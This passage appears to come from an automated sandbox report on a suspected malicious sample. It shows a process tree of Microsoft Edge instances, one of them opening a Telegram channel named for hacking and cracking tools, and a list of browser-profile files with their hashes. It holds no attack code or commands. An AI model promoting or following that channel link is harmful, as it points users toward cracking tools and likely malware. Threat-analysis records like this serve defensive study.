                                                                                                              6⤵
                                                                                                                PID:1136
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/Private_Hacking_Cracking_Tools
                                                                                                          3⤵
                                                                                                            PID:700
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff7d913cb8,0x7fff7d913cc8,0x7fff7d913cd8
                                                                                                              4⤵
                                                                                                                PID:1664
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2016 /prefetch:2
                                                                                                                4⤵
                                                                                                                  PID:1840
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 /prefetch:3
                                                                                                                  4⤵
                                                                                                                    PID:1340
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8
                                                                                                                    4⤵
                                                                                                                      PID:4304
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
                                                                                                                      4⤵
                                                                                                                        PID:1036
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
                                                                                                                        4⤵
                                                                                                                          PID:2160
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4600 /prefetch:1
                                                                                                                          4⤵
                                                                                                                            PID:4684
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
                                                                                                                            4⤵
                                                                                                                              PID:2044
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
                                                                                                                              4⤵
                                                                                                                                PID:808
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
                                                                                                                                4⤵
                                                                                                                                  PID:5516
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1
                                                                                                                                  4⤵
                                                                                                                                    PID:5596
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
                                                                                                                                    4⤵
                                                                                                                                      PID:5752
                                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:2344
                                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                  1⤵
                                                                                                                                    PID:3440

                                                                                                                                  Network

                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                  Replay Monitor

                                                                                                                                  Loading Replay Monitor...

                                                                                                                                  Downloads

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                    Filesize

                                                                                                                                    152B

                                                                                                                                    MD5

                                                                                                                                    c03d23a8155753f5a936bd7195e475bc

                                                                                                                                    SHA1

                                                                                                                                    cdf47f410a3ec000e84be83a3216b54331679d63

                                                                                                                                    SHA256

                                                                                                                                    6f5f7996d9b0e131dc2fec84859b7a8597c11a67dd41bdb5a5ef21a46e1ae0ca

                                                                                                                                    SHA512

                                                                                                                                    6ea9a631b454d7e795ec6161e08dbe388699012dbbc9c8cfdf73175a0ecd51204d45cf28a6f1706c8d5f1780666d95e46e4bc27752da9a9d289304f1d97c2f41

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                    Filesize

                                                                                                                                    152B

                                                                                                                                    MD5

                                                                                                                                    3d68c7edc2a288ee58e6629398bb9f7c

                                                                                                                                    SHA1

                                                                                                                                    6c1909dea9321c55cae38b8f16bd9d67822e2e51

                                                                                                                                    SHA256

                                                                                                                                    dfd733ed3cf4fb59f2041f82fdf676973783ffa75b9acca095609c7d4f73587b

                                                                                                                                    SHA512

                                                                                                                                    0eda66a07ec4cdb46b0f27d6c8cc157415d803af610b7430adac19547e121f380b9c6a2840f90fe49eaea9b48fa16079d93833c2bcf4b85e3c401d90d464ad2f

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                    Filesize

                                                                                                                                    152B

                                                                                                                                    MD5

                                                                                                                                    53b27f582cb38d5ab3937585ac1a1b67

                                                                                                                                    SHA1

                                                                                                                                    9b9876f673fbe903ad258a02812664f27409edc4

                                                                                                                                    SHA256

                                                                                                                                    75280f5cf4711a1b5826ed98b88176664b5cc30fe6c0e2b90d9b2ec0cba646e8

                                                                                                                                    SHA512

                                                                                                                                    4ec4090c745651ebc1f6e8cc82ebf7f9ea2931f58f40430f6d0dae6e2acc064aa8a6a3d40f6fc7548b1e05d4c7228365442bfb08e443790891618e73a212e692

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                    Filesize

                                                                                                                                    152B

                                                                                                                                    MD5

                                                                                                                                    032ea96b5df60569e774029bccf6b69b

                                                                                                                                    SHA1

                                                                                                                                    289de82a4681299f2eae6691bf379a4bcb03d488

                                                                                                                                    SHA256

                                                                                                                                    27addaee8b9de97e09fd5f55cc6bdd9a9c27eac0fa529f9957a64118bcef7ec2

                                                                                                                                    SHA512

                                                                                                                                    c2c3f070d770b72a157880fec5929494e8dbe44882b196f405cd786bc919388ceae086e7587c7fa603cfdb4977f61317762d45002d3c0cd35d2ecca1fd189fb6

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                    Filesize

                                                                                                                                    152B

                                                                                                                                    MD5

                                                                                                                                    b065c8d366464192027b017f3928546b

                                                                                                                                    SHA1

                                                                                                                                    16c54ce8c9ff992b725faeb4d7cb9aa891b0f1a9

                                                                                                                                    SHA256

                                                                                                                                    3714e7e05392481d02fc9c5908f90db9aae657d5fd2b0ae7b12b15ee8673bbe9

                                                                                                                                    SHA512

                                                                                                                                    ef39a718e8dd0c5c1e7661f59729f4b60c6dbb4cbacad5b79ae7d014f3accd37c1764b5267db9a8e4d95bd2747c73d7dc047aa93c676b3eef32cf447e3b9d465

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\1cd07ce0-ac15-4e71-a2c0-a7c283a62835.tmp

                                                                                                                                    Filesize

                                                                                                                                    1B

                                                                                                                                    MD5

                                                                                                                                    5058f1af8388633f609cadb75a75dc9d

                                                                                                                                    SHA1

                                                                                                                                    3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                                                                                    SHA256

                                                                                                                                    cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                                                                                    SHA512

                                                                                                                                    0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                    Filesize

                                                                                                                                    72B

                                                                                                                                    MD5

                                                                                                                                    0dd137cbc92473a493712de0199b6761

                                                                                                                                    SHA1

                                                                                                                                    78038215916a6edc87c772b3dbab8dc41097e552

                                                                                                                                    SHA256

                                                                                                                                    6832174a5f23c5f726d0acfc7e866c0e1e911653de6d0b8d45cceef237c19e7b

                                                                                                                                    SHA512

                                                                                                                                    d7bf61967d69912f744588d0ff159b6f1195c07303629671699b793b68a369705dca45fb030bb446b05e8689e70045426706164f83ee443699bcc98c320780bf

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                    Filesize

                                                                                                                                    72B

                                                                                                                                    MD5

                                                                                                                                    1cf96132f1e3fac5e0cbd2a88bec0553

                                                                                                                                    SHA1

                                                                                                                                    b20b480215fa64e4cf0d16d4b411b71a96345477

                                                                                                                                    SHA256

                                                                                                                                    dbfe5a4dabda790c34612861c9295c6989d9219e289c345f2aa6c28f02f9cc90

                                                                                                                                    SHA512

                                                                                                                                    c4308dcc3f938131616b53ea2fdba1662bf8a333af31881b6dce32b73987082ffcb4b823ac70c5317672a17b10652fc629ce6603e829f885dfcf266d241a0dac

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

                                                                                                                                    Filesize

                                                                                                                                    20KB

                                                                                                                                    MD5

                                                                                                                                    7babb8c3dcf9a78189a85923e3d805fe

                                                                                                                                    SHA1

                                                                                                                                    547482c3255ab915c2642496c8f8ac230e300623

                                                                                                                                    SHA256

                                                                                                                                    5666346d8f9a424506b14337a5b1e19372cc98e239bbc46a510c0c51861e8512

                                                                                                                                    SHA512

                                                                                                                                    5bc460f22357eda1d7adc8cc67ea68c47fc22169ad5c1a14cf81ce6aefa8384def1ba70abf371462a05d0c5eb7cad990c2f25cc83db2b41457eb6d7cf4c6845d

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                    Filesize

                                                                                                                                    116KB

                                                                                                                                    MD5

                                                                                                                                    645edfd0acfc06ffc51b55774f6465db

                                                                                                                                    SHA1

                                                                                                                                    c478e8fce45521666a5e7ca8c902d28d60405006

                                                                                                                                    SHA256

                                                                                                                                    dd7f10bae4a1cf05be7c2c35dacbb51189ae1f5f8d2eb77431a5c7032872aa44

                                                                                                                                    SHA512

                                                                                                                                    24338786033ca26e0538e9cf9ca88be041df155127e4f341e04e044d0624de04ff7efd42e68ff3a5d0f2c6a1ab154d62ace70c881af92bc1538ce459577eeae4

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

                                                                                                                                    Filesize

                                                                                                                                    609B

                                                                                                                                    MD5

                                                                                                                                    e4fc74479ed6494173d04a4ebb76c6cb

                                                                                                                                    SHA1

                                                                                                                                    c2713c954a0c94660593c6bbbe3b96347701c04b

                                                                                                                                    SHA256

                                                                                                                                    5b61448b93f734680cde81d2e16df96a825bcdfd2a2972f6e1e7ba9ea199d269

                                                                                                                                    SHA512

                                                                                                                                    8bfb3fbe15c2f888e2a363d9c32d5d8c82eaea28ce6e1db985313f5aa1bbd38c4db2dce7e3baca80805a93289019d017bab4bca85d4ce7050683b5bcd7e23d74

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                    Filesize

                                                                                                                                    331B

                                                                                                                                    MD5

                                                                                                                                    4f622ab206c062dc553b2742bc868037

                                                                                                                                    SHA1

                                                                                                                                    4b38aa7381686683aceb8e5839de2a61c1192dca

                                                                                                                                    SHA256

                                                                                                                                    2aa2121926cf450e3dea22c4aad6c104d983ea1b57e6193388d81e9630019426

                                                                                                                                    SHA512

                                                                                                                                    3ed43d0bbb9f39ca8fcf593fa887958b89631f9b2486d6f8c9277ae451a30d627474982b5b497595d92d3f7fe577a75f3c557e2f14f1796d14c89fc9555dfcaf

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                    Filesize

                                                                                                                                    442B

                                                                                                                                    MD5

                                                                                                                                    a57ddc0949e4e51e1b6c9576440115ec

                                                                                                                                    SHA1

                                                                                                                                    94e35c95156738a0015fc98c580eafd480221949

                                                                                                                                    SHA256

                                                                                                                                    87b927928905e9e327f84c1de3b642e6b7d890cb67d00e536b2ef216074217ff

                                                                                                                                    SHA512

                                                                                                                                    1c2e603f368c95a4e127bc49ae78456621f95cb5e6772cec26fff770e9d00581537d8591f573f5267f3de6d4314eae163796d8c2e2d607c1cb4b2cacc567bcc3

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                    Filesize

                                                                                                                                    6KB

                                                                                                                                    MD5

                                                                                                                                    6ef5f9103aa497daa181927bc5dc7ae4

                                                                                                                                    SHA1

                                                                                                                                    51b90fdf765257f1592b2e89e31bdc9ad7653fd9

                                                                                                                                    SHA256

                                                                                                                                    d1820a2a59f0e083b423f1453c1cc4e54c69f73134b352a6ec0f3bdf684dbcd6

                                                                                                                                    SHA512

                                                                                                                                    d93d4790d8716b33fc1245f3cc82fc8603aae7a5ac2bbd6f3f0fb383cbf97538dfd9fe05f7c5a75d66f294a2b3f51488ae505ebf770bc31b455fb9947c4165d2

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                    Filesize

                                                                                                                                    6KB

                                                                                                                                    MD5

                                                                                                                                    266d51c8c57157fbb69d93e0d6bef4ad

                                                                                                                                    SHA1

                                                                                                                                    d8986bd51512afa56ca0fa441901ac9de34afc39

                                                                                                                                    SHA256

                                                                                                                                    993e5eaa4104d612c21a134010cf63a3baff52c4078f204171707fe4c9f8c24c

                                                                                                                                    SHA512

                                                                                                                                    eb25eae871764f7202cca195ac29014ad330c53d2b4f376c11ddc823fcbde42df232980860d45d4d91349a26527deebd846e8880a0806cca09f24bb298d4f1a2

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                    Filesize

                                                                                                                                    6KB

                                                                                                                                    MD5

                                                                                                                                    775864e8f1a27f4d6c6f27a7842e133c

                                                                                                                                    SHA1

                                                                                                                                    0be02855189013a6b660a6e40bf7fc497f4d2d38

                                                                                                                                    SHA256

                                                                                                                                    1405d6c3463e2bbf91f6e75aec13dd8231614680768a96a5c6d073abd2e65b81

                                                                                                                                    SHA512

                                                                                                                                    64578090c40a707d1facfa6c8cc64da0544231a027faae079737e905b18551d4b842be11b0222238f25105bce45f9a10fb26df19730ea9881d09e8a6a6249e60

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                    Filesize

                                                                                                                                    5KB

                                                                                                                                    MD5

                                                                                                                                    cd6f355645929e80545c0d4ffc8436f7

                                                                                                                                    SHA1

                                                                                                                                    0ff16dea7102adba3a542a0c3e1379773761ca7d

                                                                                                                                    SHA256

                                                                                                                                    f9d11d4722aec95895b34df521694ef7ec327b56286426f1e5ce7d95ca9703f6

                                                                                                                                    SHA512

                                                                                                                                    aa3e241d7c4ee920a7021bcc3b124960836c38a85bbf409aa276f2972163fb7f3a7cec426ed75841c823d13d34d10bd7bbe215d4111b682bc52348efa791019e

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                    Filesize

                                                                                                                                    6KB

                                                                                                                                    MD5

                                                                                                                                    7175639715781658cbe8c0421efaf878

                                                                                                                                    SHA1

                                                                                                                                    80dade53f4818d6bb8fd2c043aab314bef9e7cf4

                                                                                                                                    SHA256

                                                                                                                                    f9ee6571c2f992103cb1518370672e1785ffe0515109112a2a48559296967170

                                                                                                                                    SHA512

                                                                                                                                    9b82fa50f100ef4b4e0fec004df1f4a7e0b08284dd0e757e59774f926d27b05e829a042f2bbe85f69032bdd37c371fae26ec3906f3c8d619e933a6d774df3aac

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                    Filesize

                                                                                                                                    6KB

                                                                                                                                    MD5

                                                                                                                                    2dcaa786fdc536b52f62ae4a2c87658c

                                                                                                                                    SHA1

                                                                                                                                    7f9d75c6f2db99366bdb8a802ccd12c8992009d7

                                                                                                                                    SHA256

                                                                                                                                    35da9ba1e425597d793342ec0ac3b2bc9e2a7e8907570f5fa799c1c2b9652078

                                                                                                                                    SHA512

                                                                                                                                    2ab3ada7fcca1da1d97f74ca24a53c9e6e9bbb35f98de83f769c43bc1265f5144da7a37a1a1db2776e290dfd28a54769c60222a3588f6ec80fffefebd3ca9803

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                    Filesize

                                                                                                                                    319B

                                                                                                                                    MD5

                                                                                                                                    2c814d93cf0fbee8a14da7ececb66bf4

                                                                                                                                    SHA1

                                                                                                                                    dc07f0ca85964ec1e0e63cec4baa6ffe1318034f

                                                                                                                                    SHA256

                                                                                                                                    fb5922c0296424d166a4d9fb77d50d56b120a9bf2e7c07241903178aae5ed658

                                                                                                                                    SHA512

                                                                                                                                    665cbd1435959ac525410a34b76ab6209104099bf80ebdd72543f762d41d49a2d0f80f50f3641bc749790fef26f7dae2a108cc744c7f32d3f8e91cdccfe071ac

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13379836324463591

                                                                                                                                    Filesize

                                                                                                                                    1KB

                                                                                                                                    MD5

                                                                                                                                    7c45295f553ea038c86093f3199dd33c

                                                                                                                                    SHA1

                                                                                                                                    2b81c4b63f4c4d4c49381f99c20f49e483184da0

                                                                                                                                    SHA256

                                                                                                                                    54423614f870587b8e89057f9767d92114e9e005a760add418e7e9c36e393ed6

                                                                                                                                    SHA512

                                                                                                                                    a24ba9e0725106ecac790ffdeb0048a450a6181e7d02e1c4f8d3a201bc8eae09f8c31860621141dc73862fb0331e466f114350e01368bba03be5cbb533d71dac

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                    Filesize

                                                                                                                                    347B

                                                                                                                                    MD5

                                                                                                                                    ce35f82e4f6371595a92e9e1d848eb54

                                                                                                                                    SHA1

                                                                                                                                    1a15e047aa9ad7149958cca21960a5ae195d3521

                                                                                                                                    SHA256

                                                                                                                                    1ceb3f1d448bbefd5daef2cefa2aadada7a160090c4cb4452e9cad17cb92d39a

                                                                                                                                    SHA512

                                                                                                                                    ad88d0234437e3654ba9c2ee92ad56e31f6c5e3273e9a387da9b057db038f86a7e0faeb8f787efcf857cfcd61c86885c1f153dd66db9206aa532949940b6ead3

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                    Filesize

                                                                                                                                    326B

                                                                                                                                    MD5

                                                                                                                                    4577e3535d85e1a05852d5c646593c1c

                                                                                                                                    SHA1

                                                                                                                                    d6cf2b33e202a0951f3806baa698ab1d67ed923a

                                                                                                                                    SHA256

                                                                                                                                    812abb19a9631a195c4f38613a766007dda09220d106f8baaf0788574ed4beae

                                                                                                                                    SHA512

                                                                                                                                    6d0d7a9f52402a50cace3cb1bf54bb49413864a476436d7b62d5eace3fe319967a216907def199936fef96f9f99a579340920400f9ec8535c139cd931d72a2e4

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                    Filesize

                                                                                                                                    538B

                                                                                                                                    MD5

                                                                                                                                    0190e0de07287c3aa9e90e4b1d87f914

                                                                                                                                    SHA1

                                                                                                                                    65ca2455191c725acf55c9f7984a43145546b66d

                                                                                                                                    SHA256

                                                                                                                                    7355df5e37bc5b8b14dc41e6f253203e0e5b494bc2160a586b1911ff30ac4907

                                                                                                                                    SHA512

                                                                                                                                    55b94dcb76e3253e534c6f1c2077befe63d21e5cb8c560192ece3ca1261fe163e64fe18aa19e41ab6e329761741f026253cae1b00578ce52ecfeb7605d6b7e91

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                    Filesize

                                                                                                                                    538B

                                                                                                                                    MD5

                                                                                                                                    b0b3097d8dcc2d14ce883801da3f8f1c

                                                                                                                                    SHA1

                                                                                                                                    f6b274e39b171759d177b8ffb3cd65406b60a032

                                                                                                                                    SHA256

                                                                                                                                    b179e67245d114a39aefc59d029e1cb41a192f2d58027c89240d356ef482871c

                                                                                                                                    SHA512

                                                                                                                                    48c9942d7c478e09f9c99352582d480af2ee8f5a484580ccb784163c2c06d36acf61c175e9e332d76c913d0859fe2b1b304e0c8b19b712486de9946c5d2af8bf

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

                                                                                                                                    Filesize

                                                                                                                                    128KB

                                                                                                                                    MD5

                                                                                                                                    66dff3004913c65c0416471b69f88a60

                                                                                                                                    SHA1

                                                                                                                                    62dad08bf58fa172deee9c9f355d2f85fe97a394

                                                                                                                                    SHA256

                                                                                                                                    e0d13412d45c03ecb487b908fcfabef4c3a0999982811957bd4c9297797d925e

                                                                                                                                    SHA512

                                                                                                                                    20f838a4c1caf34fa46828082f21ff151934beb88ed82975ec747c0a604efb55d89dd94972f14c32a7db1fdd731bf33bb7d68b45883a9e934c7c0e1904278b71

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

                                                                                                                                    Filesize

                                                                                                                                    44KB

                                                                                                                                    MD5

                                                                                                                                    f0947f4834da0fa2b6b58916860b6a10

                                                                                                                                    SHA1

                                                                                                                                    2cdd32668bfcaa4a5c3273053b653a148f74a1fe

                                                                                                                                    SHA256

                                                                                                                                    778a2a946103f78e990cfbb716aab132539cd91ebafd849acb8922d8fb31daf4

                                                                                                                                    SHA512

                                                                                                                                    52f535516de6beb0941a3ad5786e26c69b820adbc12d00ca4f24518484432dcca6864b7f67bfb6e8616a85b2687d2b9a32a49234c314af0419c87a7b16d197d5

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                    Filesize

                                                                                                                                    337B

                                                                                                                                    MD5

                                                                                                                                    f766fc5f901d34da3b2cdddb3bd0a945

                                                                                                                                    SHA1

                                                                                                                                    4e3069fe9f3f38425cb1cad884fe27a2674d3793

                                                                                                                                    SHA256

                                                                                                                                    25f49f33499cce89c7ace7bf6349c843994d1d541b29cd77a6a81285ef11c7a5

                                                                                                                                    SHA512

                                                                                                                                    cec797cc78824a2648223e85b3171767686fd1023a2c438485da2a658bd50302fbd356f205250003dc34e6f3e190f72af1b5f715aa97fffe42143733e747d14d

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                    Filesize

                                                                                                                                    11B

                                                                                                                                    MD5

                                                                                                                                    b29bcf9cd0e55f93000b4bb265a9810b

                                                                                                                                    SHA1

                                                                                                                                    e662b8c98bd5eced29495dbe2a8f1930e3f714b8

                                                                                                                                    SHA256

                                                                                                                                    f53ab2877a33ef4dbde62f23f0cbfb572924a80a3921f47fc080d680107064b4

                                                                                                                                    SHA512

                                                                                                                                    e15f515e4177d38d6bb83a939a0a8f901ce64dffe45e635063161497d527fbddaf2b1261195fde90b72b4c3e64ac0a0500003faceffcc749471733c9e83eb011

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                    Filesize

                                                                                                                                    10KB

                                                                                                                                    MD5

                                                                                                                                    b022a7d6819a537879ea6b046f9d098a

                                                                                                                                    SHA1

                                                                                                                                    37fff9bfc889fad921d15e3a34a78029de675fa4

                                                                                                                                    SHA256

                                                                                                                                    cefc0e6755479aa8d287bfeda4d7998aec5b9c672290fcf7a364b1bbf7534116

                                                                                                                                    SHA512

                                                                                                                                    b755dd870779e37f05109c2b637333329207c5a806e446333bafeb9fa496dc38e3ba3ce6f428accd6c9e5be8bc382dd72005b161cbe717226f1ac13feb99cab0

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                    Filesize

                                                                                                                                    10KB

                                                                                                                                    MD5

                                                                                                                                    a51e37227245311165bce89a721f1db7

                                                                                                                                    SHA1

                                                                                                                                    a14827eae25f7c82470b78f30dd04c2f373c15fb

                                                                                                                                    SHA256

                                                                                                                                    70c9aded1e6e4ba61b70816d6cba84fe7cf6dfa256070371b556a3f0bce21846

                                                                                                                                    SHA512

                                                                                                                                    4d15910ef940d1201f585a6192b98625dcd403cd2d4798c1c8396c15abf169ab29fb7eed645a2736fb8053b40709232f68bf7d56ee806af65a91274e84955d0f

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                    Filesize

                                                                                                                                    10KB

                                                                                                                                    MD5

                                                                                                                                    bd182385b1fa975c120b8350d853d9a6

                                                                                                                                    SHA1

                                                                                                                                    1ed4b8a426197d05c7c50c2fa2fcc1ad4606d5d6

                                                                                                                                    SHA256

                                                                                                                                    91f65f637e21a1c304fb69775aa558178ccd6efd58852dfacb544eb17826d510

                                                                                                                                    SHA512

                                                                                                                                    5a43756ed934e031f941421aa6740c53440bddb7604dd2707751cba43a75d6cd79ee22f9d2f59858baf8e7a489da1fcf5620e5d1077930b42f78e7912738e289

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

                                                                                                                                    Filesize

                                                                                                                                    264KB

                                                                                                                                    MD5

                                                                                                                                    f50f89a0a91564d0b8a211f8921aa7de

                                                                                                                                    SHA1

                                                                                                                                    112403a17dd69d5b9018b8cede023cb3b54eab7d

